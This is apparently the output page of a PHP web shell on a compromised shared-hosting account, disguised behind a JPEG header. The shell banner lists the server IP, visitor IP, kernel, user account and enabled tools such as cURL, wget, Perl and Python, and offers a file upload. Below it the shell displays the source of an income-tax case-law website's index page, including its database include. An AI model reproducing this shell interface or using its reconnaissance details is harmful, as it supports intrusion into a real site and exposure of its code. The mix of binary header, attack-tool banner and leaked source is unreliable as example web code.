ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.73 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/public_html/ |
Upload File : |
<?php include "head.php"; include "admin/db.php"; ?> <meta name="description" content="Income Tax you may find Income Tax Case law , Income Tax Judgments , Income Tax Ordinance, Income Tax Rules , Income Tax SROs , Income Tax Circulars , Income Tax Schedules Tax Rates (Witholding Tax) , Income Tax Board Clarification "> <meta name="keywords" content="income,tax,judgment,case,law,pakistan,tax,sld"> <title>Income Tax Case Laws, Judgments, Ordinance, Rules, SROs, Circulars, and Tax Rates</title> <style> .head{width: 100%;height: 200px; background-color: #ebebebf7;} .head img{width: 300px;} .img1st{margin: 0% 37%; padding-top: 62px;} .boxe,.boxe2{ transition:0.5s; width: 95%; height: 200px; margin-top: 20px; /* padding: 0% 2%;padding: 13% 2%; */ padding: 60px 0; /* border: 3px solid green; */ text-align: center;} .boxe{background-color: #049cae; color: white !important; border:2px solid #049cae; } .boxe2{background-color: #929a9d; color: white !important; border:2px solid #929a9d;} .boxe h1, .boxe2 h1{font-family: 'Laila', sans-serif; } a{ text-decoration: none;} .boxe span:hover { /* background: #049cae14; */ color: #929a9d !important; transition: 0.5s; } </style> <script> setTimeout(function() { document.getElementById('myDiv').classList.add('animate'); }, 100); </script> <style> #myDiv { /* width: 100px; height: 100px; background-color: red; */ opacity: 0; /* position: absolute; /* top: 50%; */ /* left: 0; */ transition: opacity 1s, left 1s; } #myDiv.animate { opacity: 1; left: 50%; } </style> <div class="container" id="myDiv" style="margin-top: 45px;"> <center> <h1 style="font-size: 55px;font-weight: bold;font-family: 'Libre Baskerville', serif;color: #4f5457;">Income Tax</h1> </center> <div class="row" style="margin-top: 25px;"> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="caselaws?tax=Income Tax"> <div class="boxe" ><span style="font-weight: 700; color: white;" ></span > <h1 style="padding:0px;margin:0px;">Case Laws</h1> <p style=" font-family: 'Laila'; padding: 0px; margin: 0px; text-align: center; font-weight: 500; font-size: 21px; "> Income Tax </p> </div> </a> </div> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="judgment?tax=Income Tax"> <div class="boxe2"><span style="font-weight: 700; color: white;"></span> <h1 style="padding:0px;margin:0px;">Judgments</h1> <p style=" font-family: 'Laila'; padding: 0px; margin: 0px; text-align: center; font-weight: 500; font-size: 21px; "> Income Tax </p> </div> </a> </div> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="ordinance?tax=Income Tax"> <div class="boxe"><span style="font-weight: 700; color: white;"></span> <h1 style="padding:0px;margin:0px;"> Income Tax Ordinances</h1> </div> </a> </div> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="rule?tax=Income Tax"> <div class="boxe2"><span style="font-weight: 700; color: white;"></span> <h1 style="padding:0px;margin:0px;">Rules</h1> <p style=" font-family: 'Laila'; padding: 0px; margin: 0px; text-align: center; font-weight: 500; font-size: 21px; "> Income Tax </p> </div> </a> </div> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="sros?tax=Income Tax"> <div class="boxe"><span style="font-weight: 700; color: white;"></span> <h1 style="padding:0px;margin:0px;">SROs</h1> <p style=" font-family: 'Laila'; padding: 0px; margin: 0px; text-align: center; font-weight: 500; font-size: 21px; "> Income Tax </p> </div> </a> </div> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="circular?tax=Income Tax"> <div class="boxe2"><span style="font-weight: 700; color: white;"></span> <h1 style="padding:0px;margin:0px;">Circulars</h1> <p style=" font-family: 'Laila'; padding: 0px; margin: 0px; text-align: center; font-weight: 500; font-size: 21px; "> Income Tax </p> </div> </a> </div> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <?php $sel="SELECT * FROM `schedule` where `id`= 1"; $data1=mysqli_query($con,$sel); $data=mysqli_fetch_assoc($data1); ?> <?php if(isset($_SESSION['logedin']) && $_SESSION['logedin']==true) { ?> <a target="_blank" href="admin/schedule/<?php echo $data['pdf']?>"> <?php } else{ ?> <a target="_blank" href="login"> <?php }?> <div class="boxe"><span style="font-weight: 700; color: white;"></span> <h1 style=" font-size: 30px; margin: 0px; padding-top: 10px;"> Schedules & Tax Rates</h1> <center><p style="font-size:25px; font-weight:bold;">(Withholding Tax)</p></center> </div> </a> </div> <!-- <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <div class="boxe2"><span style="margin-left: 17px; font-weight: 700; color: white;"></span><h1 style=" font-size: 36px;"> Act</h1></div></div> --> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="clarification?tax=Income Tax"> <div class="boxe2"><span style="font-weight: 700; color: white;"></span> <h1 style="font-size: 30px;margin:0px; padding-top: 15px;">Board Clarifications</h1> <p style=" font-family: 'Laila'; padding: 0px; margin: 0px; text-align: center; font-weight: 500; font-size: 21px; "> Income Tax </p> </div> </a> </div> <div class="col-xxl-4 col-xl-4 col-lg-4 col-md-6 col-sm-12 col-12" > <a href="miscellaneous?tax=Income Tax"> <div class="boxe"><span style=" font-weight: 700; color: white;"> </span><h1 style="margin:0px; padding-top: 8px;">Miscellaneous</h1> <p style=" font-family: 'Laila'; padding: 0px; margin: 0px; text-align: center; font-weight: 500; font-size: 21px; "> Income Tax </p> </div> </a> </div> </div> </div> </body> <br><br><br> <?php include("footer.php"); ?>